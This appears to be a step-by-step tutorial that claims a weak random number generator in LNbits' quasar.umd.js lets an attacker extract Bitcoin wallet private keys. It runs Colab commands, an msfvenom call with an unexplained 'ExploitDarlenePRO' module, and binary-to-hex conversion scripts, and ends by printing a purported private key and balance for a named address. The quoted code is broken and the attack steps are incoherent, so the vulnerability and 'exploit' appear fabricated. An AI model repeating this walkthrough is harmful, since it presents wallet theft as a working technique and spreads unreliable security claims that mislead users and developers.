In this article, we will focus on a smartphone application iOS
and Android
the popular Bitcoin Wallet that supports fast payments through (Lightning network)
BLW: Bitcoin Lightning Wallet . Unfortunately, many autonomous nodes of the open source mobile application from LNbits Node Manager and Core Lightning are exposed to a HIGH RISK of losing all funds in various cryptocurrency coins.
Developer David Shares from the Japanese company Bitcoin Portal has published many documents .
Let’s look at the theoretical basis: LNbits is a free account system for many mobile applications that work with various cryptocurrency wallets. Initially, it gained wide popularity LNbits Node Manager
with the development of Bitcoin Lightning Wallet (BLW)
… development of non-custodial and autonomous nodes for Bitcoin SPV
, designed for Android
and iPhone
with functionality Node.js
. With autonomous nodes, you have full control over your funds and need to manage your funds yourself (unlike other mobile cryptocurrency wallet apps) .
The open source Node Manager LNbits solves several problems, such as:
- Collection of paper prices for coins
, etc. - Maintaining a list of public nodes
thatBitcoin Lightning Wallet (BLW)
it uses to open payment channels. - Providing partial payment for payment routes.
- Storing an encrypted backup of your payment channel.

LNbits node manager works with services:

According to the examples of Salvador Guerrero, many who have installed
a full-fledged Bitcoin node can run on a Raspberry Pi to send and receiveBitcoin
without transaction fees . This is only possible if all crypto walletsLNbits
are in the same Core Lightning instance .

Developer David Shares of the Japanese company Bitcoin Portal published a chronological list that shows that
Lightning Network
it is drowning in technical problems, bugs, shortcomings, criticisms and exploits. It is an over-promised technology that does not provide decentralization and is still far from being functional and secure for users.
After a detailed study of all materials from the chronological list, we drew attention to a vulnerability in the framework and the process of working in the quasar.umd.js code
Quasar is an open-source Vue.js- based framework that allows you to create responsive websites and mobile applications for various cryptocurrency wallets.
As we know from the source Snyk Vulnerability Database, the latest versions of Vue.js contained vulnerabilities, which allowed the LNbits v0.11.0 version to launch a series of cyclic errors in the quasar.umd.js code
Error in quasar.umd.js code
// Use best available PRNG
var randomBytes = (function () {
// Node & Browser support
var lib = typeof crypto !== 'undefined'
? crypto
: (
typeof window !== 'undefined'
? window.msCrypto // IE11
: void 0
if (lib !== void 0) {
if (lib.randomBytes !== void 0) {
return lib.randomBytes
if (lib.getRandomValues !== void 0) {
return function (n) {
var bytes = new Uint8Array(n);
return bytes
In the case of a weak pseudo-random number generator, (PRNG)
we are given the opportunity to obtain SEED
and completely determine the private key to the Bitcoin Wallet, since the method lib.getRandomValues
loses cryptographic strength over a random value.
Let’s move on to the practical part:
(You can open the finished file from Jupyter Notebook and upload it to Google Colab notebook )
Let’s consider a real example of extracting the private key of a Bitcoin Wallet from a weak pseudo-random number generator (PRNG)
in the code quasar.umd.js
Bitcoin Wallet : In September
there was a theft in the amount of:US dollars // BITCOIN:
0.30412330 BTC

Let’s open the Google Colab service using the link:

Click on
and “Create a new notepad”

Install Ruby in Google Colab

To run the programs we need, we will install the object-oriented programming language Ruby
!sudo apt install ruby-full

Let’s check the installation version
!ruby --version

Let’s install a library
for interacting with the Bitcoin protocol/network
!gem install bitcoin-ruby

Let’s install a library
for implementing the Elliptic Curve Digital Signature Algorithm (ECDSA)
!gem install ecdsa

Let’s install a library
to convert integer or binary numbers tobase58
and from.
!gem install base58

Let’s install a library
to simplify operations with bytes and basic cryptographic operations
!gem install crypto

Let’s install a library
to simplify working with big data.
!gem install config-hash -v 0.9.0

Let’s install the Metasploit Framework and use MSFVenom

Let’s install the Metasploit Framework from GitHub and use the MSFVenom tool to create the payload.

!git clone
cd metasploit-framework/

Let’s see the contents of the folder

!./msfvenom -help

Let’s open the GitHub code and use the vulnerable file: quasar.umd.js

In the note we see a link to the file: quasar.umd.js
Let’s open the code:

LNbits, free and open-source Lightning wallet and accounts system

Install lnbits in Google Colab:
!git clone

Let’s open the vulnerable file: quasar.umd.js using the cat utility
cat lnbits/lnbits/static/vendor/quasar.umd.js

Let’s open the folders according to the directory: /modules/exploits/

Download "ExploitDarlenePRO"
from the catalogue:/modules/exploits/
cd modules/
cd exploits/

Unzip the contents
using the utility unzip

Let’s go through the catalogue:/ExploitDarlenePRO/
cd ExploitDarlenePRO/

To run the exploit, let’s go back to Metasploit Framework
cd /
cd content/metasploit-framework/

We need to identify our LHOST (Local Host)
attacking IP-address
virtual machine.
Let’s run the commands:
!ip addr
!hostname -I

Let’s use the tool to create a payload MSFVenom
For operation, select Bitcoin Wallet: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F
Launch command:
!./msfvenom 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F -p modules/exploits/ExploitDarlenePRO LHOST= -f RB -o main.rb -p lnbits/lnbits/static/vendor LHOST= -f JS -o quasar.umd.js

We need to save the resulting binary format to a file: binary.txt
let’s use the utilityecho
!echo '111111001110010001110101111111111100101000011100101000100111001101111110010101100111010110111001011100010100001000110001010011010000010111110001011101110100101001010010110110000111011010010010110000101111001000110010010100111011011111010100011111100011011' > binary.txt

Convert the binary format to the HEX format to obtain the private key of the Bitcoin Wallet:
Let’s use the code:
binaryFile = open("binary.txt", "r")
binaryFile = binaryFile.readlines()
hexFile = open("hex.txt", "w+")
# loop through each line of binaryFile then convert and write to hexFile
for line in binaryFile:
binaryCode = line.replace(" ", "")
hexCode = hex(int(binaryCode, 2))
hexCode = hexCode.replace("0x", "").upper().zfill(4)
hexFile.write(hexCode + "\n")
# close hexFile

Let’s open the file: hex.txt
cat hex.txt

Private Key Found!
Let’s install the module Bitcoin
!pip3 install bitcoin

Let’s run the code to check the compliance of Bitcoin Addresses:
from bitcoin import *
with open("hex.txt","r") as f:
content = f.readlines()
# you may also want to remove whitespace characters like `\n` at the end of each line
content = [x.strip() for x in content]
outfile = open("privtoaddr.txt","w")
for x in content:
outfile.write(x+":"+pubtoaddr(encode_pubkey(privtopub(x), "bin_compressed"))+"\n")

Let’s open the file: privtoaddr.txt
cat privtoaddr.txt

That’s right! The private key corresponds to the Bitcoin Wallet.
Let’s open bitaddress and check:
ADDR: 1qzgi39y33HrM7mHsZ6FaNspHCraJe62F
WIF: L1TWHkT6HcNVHCjsUpGecyZQqGJC5Ek98HunmRH4c3zb8V87NUiP
HEX: 7E723AFFE50E5139BF2B3ADCB8A118A682F8BBA5296C3B4961791929DBEA3F1B

BALANCE: $ 11032.77
